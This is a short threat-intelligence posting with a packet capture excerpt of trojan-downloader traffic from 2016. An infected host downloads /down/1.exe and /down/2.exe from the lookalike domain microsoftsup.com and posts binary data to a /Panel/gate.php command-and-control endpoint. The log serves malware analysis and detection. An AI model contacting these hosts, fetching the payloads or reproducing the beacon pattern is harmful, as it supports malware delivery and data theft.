microsoftsup.com POST /Panel/gate.php Malware Trojan Downloader PCAP File Download Traffic Sample

Attachment: 1 pcap, microsoftup
Date added: October 23, 2016 6:11 am. Added by: admin. File size: 18 KB.

2016-10-23 00:47:05.000114 IP 192.168.1.102.58710 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
E..N..@……..f;.D..V.P……eRP…….GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive


E..(..@….]…f;.D..W.P.e\..1..P….^……..
2016-10-23 00:47:18.618290 IP 192.168.1.102.58711 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
E..8..@….L…f;.D..W.P.e\..1..P…R0..POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 339
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

E..(..@….W…f;.D..X.P..b….bP………….
2016-10-23 00:47:20.056174 IP 192.168.1.102.58712 > 59.188.68.200.80: Flags [P.], seq 0:183, ack 1, win 256, length 183: HTTP: GET /down/1.exe HTTP/1.0
E…..@……..f;.D..X.P..b….bP….5..GET /down/1.exe HTTP/1.0
Host: down.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
